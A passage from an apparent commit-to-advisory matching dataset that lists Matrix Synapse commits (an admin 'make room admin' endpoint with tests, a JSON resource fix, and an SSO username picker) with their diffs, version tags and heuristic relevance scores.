power_levels.content", + "+ else:", + "+ # If there is no power level events then the creator has rights.", + "+ pl_content = {}", + "+ admin_user_id = create_event.sender", + "+ if not self.is_mine_id(admin_user_id):", + "+ raise SynapseError(", + "+ 400, \"No local admin user in room\",", + "+ )", + "+", + "+ # Grant the user power equal to the room admin by attempting to send an", + "+ # updated power level event.", + "+ new_pl_content = dict(pl_content)", + "+ new_pl_content[\"users\"] = dict(pl_content.get(\"users\", {}))", + "+ new_pl_content[\"users\"][user_to_add] = new_pl_content[\"users\"][admin_user_id]", + "+", + "+ fake_requester = create_requester(", + "+ admin_user_id, authenticated_entity=requester.authenticated_entity,", + "+ )", + "+", + "+ try:", + "+ await self.event_creation_handler.create_and_send_nonmember_event(", + "+ fake_requester,", + "+ event_dict={", + "+ \"content\": new_pl_content,", + "+ \"sender\": admin_user_id,", + "+ \"type\": EventTypes.PowerLevels,", + "+ \"state_key\": \"\",", + "+ \"room_id\": room_id,", + "+ },", + "+ )", + "+ except AuthError:", + "+ # The admin user we found turned out not to have enough power.", + "+ raise SynapseError(", + "+ 400, \"No local admin user in room with power to update power levels.\"", + "+ )", + "+", + "+ # Now we check if the user we're granting admin rights to is already in", + "+ # the room. If not and it's not a public room we invite them.", + "+ member_event = room_state.get((EventTypes.Member, user_to_add))", + "+ is_joined = False", + "+ if member_event:", + "+ is_joined = member_event.content[\"membership\"] in (", + "+ Membership.JOIN,", + "+ Membership.INVITE,", + "+ )", + "+", + "+ if is_joined:", + "+ return 200, {}", + "+", + "+ join_rules = room_state.get((EventTypes.JoinRules, \"\"))", + "+ is_public = False", + "+ if join_rules:", + "+ is_public = join_rules.content.get(\"join_rule\") == JoinRules.PUBLIC", + "+", + "+ if is_public:", + "+ return 200, {}", + "+", + "+ await self.room_member_handler.update_membership(", + "+ fake_requester,", + "+ target=UserID.from_string(user_to_add),", + "+ room_id=room_id,", + "+ action=Membership.INVITE,", + "+ )", + "+", + "+ return 200, {}", + "diff --git a/tests/rest/admin/test_room.py b/tests/rest/admin/test_room.py", + "index 014c30287..60a5fcecf 100644", + "--- a/tests/rest/admin/test_room.py", + "+++ b/tests/rest/admin/test_room.py", + "@@ -22,2 +22,3 @@ from mock import Mock", + " import synapse.rest.admin", + "+from synapse.api.constants import EventTypes, Membership", + " from synapse.api.errors import Codes", + "@@ -1434,2 +1435,139 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", + "+class MakeRoomAdminTestCase(unittest.HomeserverTestCase):", + "+ servlets = [", + "+ synapse.rest.admin.register_servlets,", + "+ room.register_servlets,", + "+ login.register_servlets,", + "+ ]", + "+", + "+ def prepare(self, reactor, clock, homeserver):", + "+ self.admin_user = self.register_user(\"admin\", \"pass\", admin=True)", + "+ self.admin_user_tok = self.login(\"admin\", \"pass\")", + "+", + "+ self.creator = self.register_user(\"creator\", \"test\")", + "+ self.creator_tok = self.login(\"creator\", \"test\")", + "+", + "+ self.second_user_id = self.register_user(\"second\", \"test\")", + "+ self.second_tok = self.login(\"second\", \"test\")", + "+", + "+ self.public_room_id = self.helper.create_room_as(", + "+ self.creator, tok=self.creator_tok, is_public=True", + "+ )", + "+ self.url = \"/_synapse/admin/v1/rooms/{}/make_room_admin\".format(", + "+ self.public_room_id", + "+ )", + "+", + "+ def test_public_room(self):", + "+ \"\"\"Test that getting admin in a public room works.", + "+ \"\"\"", + "+ room_id = self.helper.create_room_as(", + "+ self.creator, tok=self.creator_tok, is_public=True", + "+ )", + "+", + "+ channel = self.make_request(", + "+ \"POST\",", + "+ \"/_synapse/admin/v1/rooms/{}/make_room_admin\".format(room_id),", + "+ content={},", + "+ access_token=self.admin_user_tok,", + "+ )", + "+", + "+ self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "+", + "+ # Now we test that we can join the room and ban a user.", + "+ self.helper.join(room_id, self.admin_user, tok=self.admin_user_tok)", + "+ self.helper.change_membership(", + "+ room_id,", + "+ self.admin_user,", + "+ \"@test:test\",", + "+ Membership.BAN,", + "+ tok=self.admin_user_tok,", + "+ )", + "+", + "+ def test_private_room(self):", + "+ \"\"\"Test that getting admin in a private room works and we get invited.", + "+ \"\"\"", + "+ room_id = self.helper.create_room_as(", + "+ self.creator, tok=self.creator_tok, is_public=False,", + "+ )", + "+", + "+ channel = self.make_request(", + "+ \"POST\",", + "+ \"/_synapse/admin/v1/rooms/{}/make_room_admin\".format(room_id),", + "+ content={},", + "+ access_token=self.admin_user_tok,", + "+ )", + "+", + "+ self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "+", + "+ # Now we test that we can join the room (we should have received an", + "+ # invite) and can ban a user.", + "+ self.helper.join(room_id, self.admin_user, tok=self.admin_user_tok)", + "+ self.helper.change_membership(", + "+ room_id,", + "+ self.admin_user,", + "+ \"@test:test\",", + "+ Membership.BAN,", + "+ tok=self.admin_user_tok,", + "+ )", + "+", + "+ def test_other_user(self):", + "+ \"\"\"Test that giving admin in a public room works to a non-admin user works.", + "+ \"\"\"", + "+ room_id = self.helper.create_room_as(", + "+ self.creator, tok=self.creator_tok, is_public=True", + "+ )", + "+", + "+ channel = self.make_request(", + "+ \"POST\",", + "+ \"/_synapse/admin/v1/rooms/{}/make_room_admin\".format(room_id),", + "+ content={\"user_id\": self.second_user_id},", + "+ access_token=self.admin_user_tok,", + "+ )", + "+", + "+ self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "+", + "+ # Now we test that we can join the room and ban a user.", + "+ self.helper.join(room_id, self.second_user_id, tok=self.second_tok)", + "+ self.helper.change_membership(", + "+ room_id,", + "+ self.second_user_id,", + "+ \"@test:test\",", + "+ Membership.BAN,", + "+ tok=self.second_tok,", + "+ )", + "+", + "+ def test_not_enough_power(self):", + "+ \"\"\"Test that we get a sensible error if there are no local room admins.", + "+ \"\"\"", + "+ room_id = self.helper.create_room_as(", + "+ self.creator, tok=self.creator_tok, is_public=True", + "+ )", + "+", + "+ # The creator drops admin rights in the room.", + "+ pl = self.helper.get_state(", + "+ room_id, EventTypes.PowerLevels, tok=self.creator_tok", + "+ )", + "+ pl[\"users\"][self.creator] = 0", + "+ self.helper.send_state(", + "+ room_id, EventTypes.PowerLevels, body=pl, tok=self.creator_tok", + "+ )", + "+", + "+ channel = self.make_request(", + "+ \"POST\",", + "+ \"/_synapse/admin/v1/rooms/{}/make_room_admin\".format(room_id),", + "+ content={},", + "+ access_token=self.admin_user_tok,", + "+ )", + "+", + "+ # We expect this to fail with a 400 as there are no room admins.", + "+ #", + "+ # (Note we assert the error message to ensure that it's not denied for", + "+ # some other reason)", + "+ self.assertEqual(400, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "+ self.assertEqual(", + "+ channel.json_body[\"error\"],", + "+ \"No local admin user in room with power to update power levels.\",", + "+ )", + "+", + "+", + " PURGE_TABLES = [" + ], + "changed_files": [ + "changelog.d/8756.feature", + "synapse/rest/admin/__init__.py", + "synapse/rest/admin/rooms.py", + "tests/rest/admin/test_room.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8756": "admin-api: Don't Allow Admins to Invite Themselves Into Private Rooms #9027" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "COMMIT_IS_SECURITY_RELEVANT", + "message": "", + "relevance": 32 + }, + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8756, 8756", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: server", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8756", + "relevance": 2 + } + ] + }, + { + "commit_id": "1821f7cc265ab01cfee4055cfddb90563b61ce5b", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607604175, + "hunks": 3, + "message": "Fix buglet in DirectRenderJsonResource (#8897) this was using `canonical_json` without setting it, so when you used it as a standalone class, you would get exceptions.", + "diff": [ + "diff --git a/changelog.d/8897.feature b/changelog.d/8897.feature", + "new file mode 100644", + "index 000000000..d450ef499", + "--- /dev/null", + "+++ b/changelog.d/8897.feature", + "@@ -0,0 +1 @@", + "+Add support for allowing users to pick their own user ID during a single-sign-on login.", + "diff --git a/synapse/http/server.py b/synapse/http/server.py", + "index 6a4e429a6..e464bfe6c 100644", + "--- a/synapse/http/server.py", + "+++ b/synapse/http/server.py", + "@@ -277,2 +277,6 @@ class DirectServeJsonResource(_AsyncResource):", + "+ def __init__(self, canonical_json=False, extract_context=False):", + "+ super().__init__(extract_context)", + "+ self.canonical_json = canonical_json", + "+", + " def _send_response(", + "@@ -320,5 +324,3 @@ class JsonResource(DirectServeJsonResource):", + " def __init__(self, hs, canonical_json=True, extract_context=False):", + "- super().__init__(extract_context)", + "-", + "- self.canonical_json = canonical_json", + "+ super().__init__(canonical_json, extract_context)", + " self.clock = hs.get_clock()" + ], + "changed_files": [ + "changelog.d/8897.feature", + "synapse/http/server.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8897": "" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8897, 8897", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: setting, resource", + "relevance": 4 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: server", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8897", + "relevance": 2 + } + ] + }, + { + "commit_id": "28877fade90a5cfb3457c9e6c70924dbbe8af715", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608301186, + "hunks": 43, + "message": "Implement a username picker for synapse (#8942) The final part (for now) of my work to implement a username picker in synapse itself. The idea is that we allow `UsernameMappingProvider`s to return `localpart=None`, in which case, rather than redirecting the browser back to the client, we redirect to a username-picker resource, which allows the user to enter a username. We *then* complete the SSO flow (including doing the client permission checks). The static resources for the username picker itself (in https://github.com/matrix-org/synapse/tree/rav/username_picker/synapse/res/username_picker) are essentially lifted wholesale from https://github.com/matrix-org/matrix-synapse-saml-mozilla/tree/master/matrix_synapse_saml_mozilla/res. As the comment says, we might want to think about making them customisable, but that can be a follow-up. Fixes #8876.", + "diff": [ + "diff --git a/changelog.d/8942.feature b/changelog.d/8942.feature", + "new file mode 100644", + "index 000000000..d450ef499", + "--- /dev/null", + "+++ b/changelog.d/8942.feature", + "@@ -0,0 +1 @@", + "+Add support for allowing users to pick their own user ID during a single-sign-on login.", + "diff --git a/docs/sample_config.yaml b/docs/sample_config.yaml", + "index 549c581a9..077cb619c 100644", + "--- a/docs/sample_config.yaml", + "+++ b/docs/sample_config.yaml", + "@@ -1827,5 +1827,6 @@ oidc_config:", + " #", + "- # This must be configured if using the default mapping provider.", + "+ # If this is not set, the user will be prompted to choose their", + "+ # own username.", + " #", + "- localpart_template: \"{{ user.preferred_username }}\"", + "+ #localpart_template: \"{{ user.preferred_username }}\"", + "diff --git a/synapse/app/homeserver.py b/synapse/app/homeserver.py", + "index bbb740783..8d9b53be5 100644", + "--- a/synapse/app/homeserver.py", + "+++ b/synapse/app/homeserver.py", + "@@ -65,2 +65,3 @@ from synapse.rest.health import HealthResource", + " from synapse.rest.key.v2 import KeyApiV2Resource", + "+from synapse.rest.synapse.client.pick_username import pick_username_resource", + " from synapse.rest.well_known import WellKnownResource", + "@@ -194,2 +195,3 @@ class SynapseHomeServer(HomeServer):", + " \"/_synapse/admin\": AdminRestResource(self),", + "+ \"/_synapse/client/pick_username\": pick_username_resource(self),", + " }", + "diff --git a/synapse/config/oidc_config.py b/synapse/config/oidc_config.py", + "index 1abf8ed40..4e3055282 100644", + "--- a/synapse/config/oidc_config.py", + "+++ b/synapse/config/oidc_config.py", + "@@ -205,5 +205,6 @@ class OIDCConfig(Config):", + " #", + "- # This must be configured if using the default mapping provider.", + "+ # If this is not set, the user will be prompted to choose their", + "+ # own username.", + " #", + "- localpart_template: \"{{{{ user.preferred_username }}}}\"", + "+ #localpart_template: \"{{{{ user.preferred_username }}}}\"", + "diff --git a/synapse/handlers/oidc_handler.py b/synapse/handlers/oidc_handler.py", + "index cbd11a138..709f8dfc1 100644", + "--- a/synapse/handlers/oidc_handler.py", + "+++ b/synapse/handlers/oidc_handler.py", + "@@ -949,3 +949,3 @@ class OidcHandler(BaseHandler):", + " UserAttributeDict = TypedDict(", + "- \"UserAttributeDict\", {\"localpart\": str, \"display_name\": Optional[str]}", + "+ \"UserAttributeDict\", {\"localpart\": Optional[str], \"display_name\": Optional[str]}", + " )", + "@@ -1030,6 +1030,6 @@ env = Environment(finalize=jinja_finalize)", + " class JinjaOidcMappingConfig:", + "- subject_claim = attr.ib() # type: str", + "- localpart_template = attr.ib() # type: Template", + "- display_name_template = attr.ib() # type: Optional[Template]", + "- extra_attributes = attr.ib() # type: Dict[str, Template]", + "+ subject_claim = attr.ib(type=str)", + "+ localpart_template = attr.ib(type=Optional[Template])", + "+ display_name_template = attr.ib(type=Optional[Template])", + "+ extra_attributes = attr.ib(type=Dict[str, Template])", + "@@ -1049,14 +1049,10 @@ class JinjaOidcMappingProvider(OidcMappingProvider[JinjaOidcMappingConfig]):", + "- if \"localpart_template\" not in config:", + "- raise ConfigError(", + "- \"missing key: oidc_config.user_mapping_provider.config.localpart_template\"", + "- )", + "-", + "- try:", + "- localpart_template = env.from_string(config[\"localpart_template\"])", + "- except Exception as e:", + "- raise ConfigError(", + "- \"invalid jinja template for oidc_config.user_mapping_provider.config.localpart_template: %r\"", + "- % (e,)", + "- )", + "+ localpart_template = None # type: Optional[Template]", + "+ if \"localpart_template\" in config:", + "+ try:", + "+ localpart_template = env.from_string(config[\"localpart_template\"])", + "+ except Exception as e:", + "+ raise ConfigError(", + "+ \"invalid jinja template\", path=[\"localpart_template\"]", + "+ ) from e", + "@@ -1068,5 +1064,4 @@ class JinjaOidcMappingProvider(OidcMappingProvider[JinjaOidcMappingConfig]):", + " raise ConfigError(", + "- \"invalid jinja template for oidc_config.user_mapping_provider.config.display_name_template: %r\"", + "- % (e,)", + "- )", + "+ \"invalid jinja template\", path=[\"display_name_template\"]", + "+ ) from e", + "@@ -1076,5 +1071,3 @@ class JinjaOidcMappingProvider(OidcMappingProvider[JinjaOidcMappingConfig]):", + " if not isinstance(extra_attributes_config, dict):", + "- raise ConfigError(", + "- \"oidc_config.user_mapping_provider.config.extra_attributes must be a dict\"", + "- )", + "+ raise ConfigError(\"must be a dict\", path=[\"extra_attributes\"])", + "@@ -1085,5 +1078,4 @@ class JinjaOidcMappingProvider(OidcMappingProvider[JinjaOidcMappingConfig]):", + " raise ConfigError(", + "- \"invalid jinja template for oidc_config.user_mapping_provider.config.extra_attributes.%s: %r\"", + "- % (key, e)", + "- )", + "+ \"invalid jinja template\", path=[\"extra_attributes\", key]", + "+ ) from e", + "@@ -1102,10 +1094,13 @@ class JinjaOidcMappingProvider(OidcMappingProvider[JinjaOidcMappingConfig]):", + " ) -> UserAttributeDict:", + "- localpart = self._config.localpart_template.render(user=userinfo).strip()", + "+ localpart = None", + "+", + "+ if self._config.localpart_template:", + "+ localpart = self._config.localpart_template.render(user=userinfo).strip()", + "- # Ensure only valid characters are included in the MXID.", + "- localpart = map_username_to_mxid_localpart(localpart)", + "+ # Ensure only valid characters are included in the MXID.", + "+ localpart = map_username_to_mxid_localpart(localpart)", + "- # Append suffix integer if last call to this function failed to produce", + "- # a usable mxid.", + "- localpart += str(failures) if failures else \"\"", + "+ # Append suffix integer if last call to this function failed to produce", + "+ # a usable mxid.", + "+ localpart += str(failures) if failures else \"\"", + "diff --git a/synapse/handlers/sso.py b/synapse/handlers/sso.py", + "index f054b66a5..548b02211 100644", + "--- a/synapse/handlers/sso.py", + "+++ b/synapse/handlers/sso.py", + "@@ -15,5 +15,6 @@", + " import logging", + "-from typing import TYPE_CHECKING, Awaitable, Callable, List, Optional", + "+from typing import TYPE_CHECKING, Awaitable, Callable, Dict, List, Optional", + " import attr", + "+from typing_extensions import NoReturn", + "@@ -21,3 +22,3 @@ from twisted.web.http import Request", + "-from synapse.api.errors import RedirectException", + "+from synapse.api.errors import RedirectException, SynapseError", + " from synapse.http.server import respond_with_html", + "@@ -26,2 +27,3 @@ from synapse.types import JsonDict, UserID, contains_invalid_mxid_characters", + " from synapse.util.async_helpers import Linearizer", + "+from synapse.util.stringutils import random_string", + "@@ -42,3 +44,6 @@ class MappingException(Exception):", + " class UserAttributes:", + "- localpart = attr.ib(type=str)", + "+ # the localpart of the mxid that the mapper has assigned to the user.", + "+ # if `None`, the mapper has not picked a userid, and the user should be prompted to", + "+ # enter one.", + "+ localpart = attr.ib(type=Optional[str])", + " display_name = attr.ib(type=Optional[str], default=None)", + "@@ -47,2 +52,31 @@ class UserAttributes:", + "+@attr.s(slots=True)", + "+class UsernameMappingSession:", + "+ \"\"\"Data we track about SSO sessions\"\"\"", + "+", + "+ # A unique identifier for this SSO provider, e.g. \"oidc\" or \"saml\".", + "+ auth_provider_id = attr.ib(type=str)", + "+", + "+ # user ID on the IdP server", + "+ remote_user_id = attr.ib(type=str)", + "+", + "+ # attributes returned by the ID mapper", + "+ display_name = attr.ib(type=Optional[str])", + "+ emails = attr.ib(type=List[str])", + "+", + "+ # An optional dictionary of extra attributes to be provided to the client in the", + "+ # login response.", + "+ extra_login_attributes = attr.ib(type=Optional[JsonDict])", + "+", + "+ # where to redirect the client back to", + "+ client_redirect_url = attr.ib(type=str)", + "+", + "+ # expiry time for the session, in milliseconds", + "+ expiry_time_ms = attr.ib(type=int)", + "+", + "+", + "+# the HTTP cookie used to track the mapping session id", + "+USERNAME_MAPPING_SESSION_COOKIE_NAME = b\"username_mapping_session\"", + "+", + "+", + " class SsoHandler:", + "@@ -51,3 +85,7 @@ class SsoHandler:", + "+ # the time a UsernameMappingSession remains valid for", + "+ _MAPPING_SESSION_VALIDITY_PERIOD_MS = 15 * 60 * 1000", + "+", + " def __init__(self, hs: \"HomeServer\"):", + "+ self._clock = hs.get_clock()", + " self._store = hs.get_datastore()", + "@@ -61,2 +99,5 @@ class SsoHandler:", + "+ # a map from session id to session data", + "+ self._username_mapping_sessions = {} # type: Dict[str, UsernameMappingSession]", + "+", + " def render_error(", + "@@ -208,2 +249,14 @@ class SsoHandler:", + " attributes = await self._call_attribute_mapper(sso_to_matrix_id_mapper)", + "+", + "+ if attributes.localpart is None:", + "+ # the mapper doesn't return a username. bail out with a redirect to", + "+ # the username picker.", + "+ await self._redirect_to_username_picker(", + "+ auth_provider_id,", + "+ remote_user_id,", + "+ attributes,", + "+ client_redirect_url,", + "+ extra_login_attributes,", + "+ )", + "+", + " user_id = await self._register_mapped_user(", + "@@ -245,6 +298,4 @@ class SsoHandler:", + " if not attributes.localpart:", + "- raise MappingException(", + "- \"Error parsing SSO response: SSO mapping provider plugin \"", + "- \"did not return a localpart value\"", + "- )", + "+ # the mapper has not picked a localpart", + "+ return attributes", + "@@ -263,2 +314,55 @@ class SsoHandler:", + "+ async def _redirect_to_username_picker(", + "+ self,", + "+ auth_provider_id: str,", + "+ remote_user_id: str,", + "+ attributes: UserAttributes,", + "+ client_redirect_url: str,", + "+ extra_login_attributes: Optional[JsonDict],", + "+ ) -> NoReturn:", + "+ \"\"\"Creates a UsernameMappingSession and redirects the browser", + "+", + "+ Called if the user mapping provider doesn't return a localpart for a new user.", + "+ Raises a RedirectException which redirects the browser to the username picker.", + "+", + "+ Args:", + "+ auth_provider_id: A unique identifier for this SSO provider, e.g.", + "+ \"oidc\" or \"saml\".", + "+", + "+ remote_user_id: The unique identifier from the SSO provider.", + "+", + "+ attributes: the user attributes returned by the user mapping provider.", + "+", + "+ client_redirect_url: The redirect URL passed in by the client, which we", + "+ will eventually redirect back to.", + "+", + "+ extra_login_attributes: An optional dictionary of extra", + "+ attributes to be provided to the client in the login response.", + "+", + 